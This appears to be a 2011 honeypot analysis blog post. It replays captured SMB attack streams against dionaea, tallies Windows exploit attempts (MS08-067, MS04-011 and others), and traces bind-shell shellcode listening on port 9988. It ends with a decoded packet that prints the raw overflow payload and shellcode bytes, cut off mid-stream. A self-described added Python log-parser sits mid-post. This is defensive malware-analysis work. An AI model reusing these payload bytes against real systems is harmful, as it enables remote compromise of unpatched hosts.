rumors

... and beer improves your driving skills!
Twitter is key to spreading rumors; nobody even asks for proof1).

Given the current rumors about MS11-0202) exploit code and malware in the wild, I've had a look at the ore.

attention please

While I could not confirm the rumors, I found something of interest and asked the mailing list for assistance.
The usual suspect turned in bistreams, and as the hosts in question had many different bistreams on the day of the interesting attack pattern, I received way more streams than I asked for. Now, I did not know which bistream was the interesting one I was looking for, so I replayed all streams in a row:

for i in /tmp/dionaea-lcreat-bistreams-daten/markus/smbd-445-65.79.250.71-*; do 
    echo $(date) $i; ./retry.py -f $i -H localhost -p 445 -rs >/dev/null; 
done
Tue Apr 19 18:29:40 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-2xsFlv
...
Tue Apr 19 18:31:54 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-qV3cF0
...
Tue Apr 19 18:34:32 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-zSGWuU

and checked the resulting attacks using readlogsqltree once this was done:

/opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite -t $(date +"%s")-1*3600
using database located at /opt/dionaea/var/dionaea/logsql.sqlite
2011-04-19 18:29:40
  connection 1532 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47853 (1532 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:29:47
  connection 1533 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47858 (1533 None)
2011-04-19 18:29:51
  connection 1534 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47861 (1534 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:29:59
  connection 1535 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:47866 (1535 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:30:07
  connection 1536 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33278 (1536 None)
    connection 1537 emulation tcp listen 0.0.0.0:9988 (1536 1536)
2011-04-19 18:30:09
  connection 1538 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33281 (1538 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:30:16
  connection 1539 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33286 (1539 None)
2011-04-19 18:30:20
  connection 1540 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33289 (1540 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:30:27
  connection 1541 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33294 (1541 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2011-04-19 18:30:34
  connection 1542 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33299 (1542 None)
2011-04-19 18:30:36
  connection 1543 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33302 (1543 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
    connection 1544 emulation tcp listen 0.0.0.0:9988 (1543 1543)
2011-04-19 18:30:43
  connection 1545 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33307 (1545 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:30:49
  connection 1546 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33310 (1546 None)
2011-04-19 18:30:52
  connection 1547 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33311 (1547 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2011-04-19 18:30:58
  connection 1548 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33315 (1548 None)
2011-04-19 18:31:03
  connection 1549 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33316 (1549 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:31:09
  connection 1550 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33319 (1550 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
    connection 1551 emulation tcp listen 0.0.0.0:9988 (1550 1550)
2011-04-19 18:31:20
  connection 1552 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33328 (1552 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:31:27
  connection 1553 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33334 (1553 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
2011-04-19 18:31:39
  connection 1554 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33341 (1554 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
2011-04-19 18:31:52
  connection 1555 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33342 (1555 None)
    connection 1556 emulation tcp listen 0.0.0.0:9988 (1555 1555)
2011-04-19 18:31:54
  connection 1557 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33343 (1557 None)
   profile: [{'return': '4711', 'args': ['.exe', '6'], 'call': '_lcreat'}, {'return': '0x71a10000', 'args': ['ws2_32.dll'], 'call': 'LoadLibraryA'}, {'return': '65', 'args': ['2', '1', '6'], 'call': 'socket'}, {'return': '0', 'args': ['65', {'sin_port': '9988', 'sin_addr': {'s_addr': '0.0.0.0'}, 'sin_zero': '       ', 'sin_family': '2'}, '16'], 'call': 'bind'}, {'return': '0', 'args': ['65', '16'], 'call': 'listen'}, {'return': '68', 'args': ['65', {}, ''], 'call': 'accept'}]
   profile: []
2011-04-19 18:31:56
  connection 1558 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33344 (1558 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
2011-04-19 18:32:08
  connection 1559 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33345 (1559 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:32:15
  connection 1560 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33346 (1560 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
2011-04-19 18:32:27
  connection 1561 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33347 (1561 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
    connection 1562 emulation tcp listen 0.0.0.0:9988 (1561 1561)
2011-04-19 18:32:39
  connection 1563 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33348 (1563 None)
2011-04-19 18:32:44
  connection 1564 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33349 (1564 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
2011-04-19 18:32:56
  connection 1565 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33350 (1565 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:33:04
  connection 1566 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33352 (1566 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
    connection 1567 emulation tcp listen 0.0.0.0:9988 (1566 1566)
2011-04-19 18:33:11
  connection 1568 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33353 (1568 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:33:17
  connection 1569 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33354 (1569 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2011-04-19 18:33:24
  connection 1570 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33355 (1570 None)
   dcerpc bind: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '1ff70682-0a51-30e8-076d-740be8cee98b' (ATSVC) opnum 0 (None (None))
2011-04-19 18:33:30
  connection 1571 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33356 (1571 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
2011-04-19 18:33:43
  connection 1572 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33357 (1572 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
    connection 1573 emulation tcp listen 0.0.0.0:9988 (1572 1572)
2011-04-19 18:33:55
  connection 1574 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33359 (1574 None)
   dcerpc bind: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345778-1234-abcd-ef00-0123456789ab' (lsarpc) opnum 44 (OpenPolicy ())
2011-04-19 18:34:03
  connection 1575 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33360 (1575 None)
2011-04-19 18:34:07
  connection 1576 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33361 (1576 None)
   dcerpc bind: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
   dcerpc request: uuid '8d9f4e40-a03d-11ce-8f69-08003e30051b' (PNP) opnum 54 (PNP_QueryResConfList (MS05-39))
2011-04-19 18:34:19
  connection 1577 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33362 (1577 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
    connection 1578 emulation tcp listen 0.0.0.0:9988 (1577 1577)
2011-04-19 18:34:32
  connection 1579 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33363 (1579 None)

So I decided to query sqlite for some statistics regarding the attacks:

SELECT
	COUNT(DISTINCT connections.connection),
	dcerpcserviceop_vuln,
	dcerpcservice_name,
	dcerpcserviceop_name
FROM
	connections
	JOIN dcerpcbinds
	NATURAL JOIN dcerpcrequests
	JOIN dcerpcservices ON(dcerpcservice_uuid = dcerpcbind_uuid)
	JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcservice = dcerpcservices.dcerpcservice AND dcerpcserviceop_opnum = dcerpcrequest_opnum) 
	WHERE connections.connection >= 1532
GROUP BY
	dcerpcservice_name,
	dcerpcserviceop_name
ORDER BY 
	dcerpcserviceop_vuln DESC,
	COUNT(DISTINCT connections.connection) DESC
 #  vuln     Service           Call
 5  MS08-67  SRVSVC            NetPathCanonicalize
 4  MS05-39  PNP               PNP_QueryResConfList
 4  MS04-12  ISystemActivator  RemoteCreateInstance
 3  MS04-11  DSSETUP           DsRolerUpgradeDownlevelServer
 9           lsarpc            Close
 9           spoolss           EnumPrinters
 4           lsarpc            OpenPolicy

The remote host definitely wanted us to join its army, using 4 different exploits, multiple sessions per exploit, and even multiple exploits per session:

2011-04-19 18:32:27
  connection 1561 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33347 (1561 None)
   dcerpc bind: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))
   dcerpc request: uuid '000001a0-0000-0000-c000-000000000046' (ISystemActivator) opnum 4 (RemoteCreateInstance (MS04-12))

This is called Double-Tap3).

Spotting the attack we were interested in:

2011-04-19 18:31:54
  connection 1557 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33343 (1557 None)
   profile: [{'return': '4711', 'args': ['.exe', '6'], 'call': '_lcreat'}, {'return': '0x71a10000', 'args': ['ws2_32.dll'], 'call': 'LoadLibraryA'}, {'return': '65', 'args': ['2', '1', '6'], 'call': 'socket'}, {'return': '0', 'args': ['65', {'sin_port': '9988', 'sin_addr': {'s_addr': '0.0.0.0'}, 'sin_zero': '       ', 'sin_family': '2'}, '16'], 'call': 'bind'}, {'return': '0', 'args': ['65', '16'], 'call': 'listen'}, {'return': '68', 'args': ['65', {}, ''], 'call': 'accept'}]
   profile: []

taking the timestamp and getting the proper bistream:

Tue Apr 19 18:31:54 CEST 2011 /tmp/lcreat/smbd-445-65.79.250.71-qV3cF0
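What this section does by hand (tallying requests per vulnerability, noticing the repeated requests, and matching the profile line's timestamp to a bistream file) can be done from the readlogsqltree text directly. The following Python is an added example, not part of the post and not dionaea's code: it parses an excerpt of the output above (embedded as the constructed sample LOG), counts distinct connections per (vuln, service, call) the way the SQL statistics do, flags connections that issue the same DCERPC request more than once (the Double-Tap), and returns the timestamp and a summary of the libemu profile for every connection that ran shellcode. The connect-back branch in summarize_profile is an assumption about how such traces look; the page only shows the bind-shell trace.

```python
import ast
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Constructed sample input: an excerpt of the readlogsqltree output shown above.
LOG = """\
2011-04-19 18:31:54
  connection 1557 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33343 (1557 None)
   profile: [{'return': '4711', 'args': ['.exe', '6'], 'call': '_lcreat'}, {'return': '0x71a10000', 'args': ['ws2_32.dll'], 'call': 'LoadLibraryA'}, {'return': '65', 'args': ['2', '1', '6'], 'call': 'socket'}, {'return': '0', 'args': ['65', {'sin_port': '9988', 'sin_addr': {'s_addr': '0.0.0.0'}, 'sin_zero': '       ', 'sin_family': '2'}, '16'], 'call': 'bind'}, {'return': '0', 'args': ['65', '16'], 'call': 'listen'}, {'return': '68', 'args': ['65', {}, ''], 'call': 'accept'}]
   profile: []
2011-04-19 18:31:56
  connection 1558 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33344 (1558 None)
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
2011-04-19 18:33:04
  connection 1566 smbd tcp accept 127.0.0.1:445 <- 127.0.0.1:33352 (1566 None)
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
    connection 1567 emulation tcp listen 0.0.0.0:9988 (1566 1566)
"""

TS_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)$")
CONN_RE = re.compile(r"^\s+connection (\d+) (\w+) \w+ (\w+) (.*)$")
REQ_RE = re.compile(r"dcerpc request: uuid '([0-9a-f-]+)' \((\w+)\) opnum (\d+) \((\S+) \(([^)]*)\)\)")
PROFILE_RE = re.compile(r"profile: (\[.*\])$")


@dataclass
class Connection:
    timestamp: str
    cid: int
    requests: list = field(default_factory=list)   # (uuid, service, opnum, opname, vuln)
    profiles: list = field(default_factory=list)   # libemu API-call traces, one per 'profile:' line
    listeners: list = field(default_factory=list)  # ports of child 'emulation ... listen' connections


def parse_readlogsqltree(text):
    """Turn the indented readlogsqltree text into one Connection per timestamped root entry."""
    conns, current, ts = [], None, None
    for line in text.splitlines():
        if m := TS_RE.match(line):
            ts, current = m.group(1), None
        elif m := CONN_RE.match(line):
            cid, proto, state, rest = m.groups()
            if current is None:                        # first connection after a timestamp is the root
                current = Connection(ts, int(cid))
                conns.append(current)
            elif proto == "emulation" and state == "listen":
                current.listeners.append(int(rest.split()[0].rsplit(":", 1)[1]))
        elif current is not None and (m := REQ_RE.search(line)):
            uuid, service, opnum, opname, vuln = m.groups()
            current.requests.append((uuid, service, int(opnum), opname, vuln))
        elif current is not None and (m := PROFILE_RE.search(line)):
            current.profiles.append(ast.literal_eval(m.group(1)))
    return conns


def request_stats(conns):
    """Distinct connections per (vuln, service, opname), the same grouping as the SQL statistics."""
    seen = defaultdict(set)
    for c in conns:
        for _uuid, service, _opnum, opname, vuln in c.requests:
            seen[(vuln, service, opname)].add(c.cid)
    return {key: len(cids) for key, cids in seen.items()}


def double_taps(conns):
    """Connections that issue the same DCERPC request more than once: the Double-Tap pattern."""
    hits = []
    for c in conns:
        for (service, opname), n in Counter((r[1], r[3]) for r in c.requests).items():
            if n > 1:
                hits.append((c.cid, service, opname, n))
    return hits


def summarize_profile(profile):
    """Reduce a libemu API-call trace to triage facts: files dropped and the port the shellcode listens on."""
    calls = {entry["call"] for entry in profile}
    summary = {"dropped_files": [], "listen_port": None, "kind": "unknown"}
    for entry in profile:
        if entry["call"] == "_lcreat":
            summary["dropped_files"].append(entry["args"][0])
        elif entry["call"] == "bind":
            summary["listen_port"] = int(entry["args"][1]["sin_port"])
    if {"socket", "bind", "listen", "accept"} <= calls:
        summary["kind"] = "bindshell"
    elif "connect" in calls:  # assumption: a connect-back trace shows socket/connect instead of bind/listen/accept
        summary["kind"] = "connectback"
    return summary


def shellcode_connections(conns):
    """(timestamp, connection id, summary) per non-empty profile; the timestamp is the key to the bistream file."""
    return [(c.timestamp, c.cid, summarize_profile(p)) for c in conns for p in c.profiles if p]
```

Run over the full readlogsqltree output, request_stats reproduces the per-vulnerability counts of the SQL query without touching the database, double_taps lists every connection like 1561 above, and shellcode_connections hands back "2011-04-19 18:31:54" for connection 1557, which is exactly the line to look for in the replay output.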

Replaying this attack reveals this packet (in the debug logs):

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 4287            sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Command             = SMB_COM_SESSION_SETUP_ANDX sizeof(  1) off=  4 goff=  8
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = CASES_ENSITIVITY+CANONICAL_PATHNAMES sizeof(  1) off=  9 goff= 13
     Flags2              = KNOWS_LONG_NAMES+KNOWS_EAS+SECURITY_SIGNATURE+EXT_SEC sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 0               sizeof(  2) off= 24 goff= 28
     PID                 = 14592           sizeof(  2) off= 26 goff= 30
     UID                 = 0               sizeof(  2) off= 28 goff= 32
     MID                 = 0               sizeof(  2) off= 30 goff= 34
###[ SMB Sessionsetup ESEC AndX Request sizeof(4249) ]### 
        WordCount           = 12              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff= 37
        AndXReserved        = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 0               sizeof(  2) off=  3 goff= 39
        MaxBufferSize       = 4356            sizeof(  2) off=  5 goff= 41
        MaxMPXCount         = 10              sizeof(  2) off=  7 goff= 43
        VCNumber            = 0               sizeof(  2) off=  9 goff= 45
        SessionKey          = 0               sizeof(  4) off= 11 goff= 47
        SecurityBlobLength  = 4222            sizeof(  2) off= 15 goff= 51
        Reserved            = 0               sizeof(  4) off= 17 goff= 53
        Capabilties         = UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS+EXTENDED_SECURITY sizeof(  4) off= 21 goff= 57
        ByteCount           = 4222            sizeof(  2) off= 25 goff= 61
        SecurityBlob        = b'`\x82\x10z\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\x10n0\x82\x10j\xa1\x82\x10f#\x82\x10b\x03\x82\x04\x01\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x03\x00#\x82\x0cW\x03\x82\x04\n\x00\x90B\x90B\x90B\x90B\x81\xc4\xff\xef\xff\xffD\xeb\x02\xebk\xe8\xf9\xff\xff\xffSUVW\x8bl$\x18\x8bE<\x8bT(x\x03\xd5\x8bJ\x18\x8bZ 
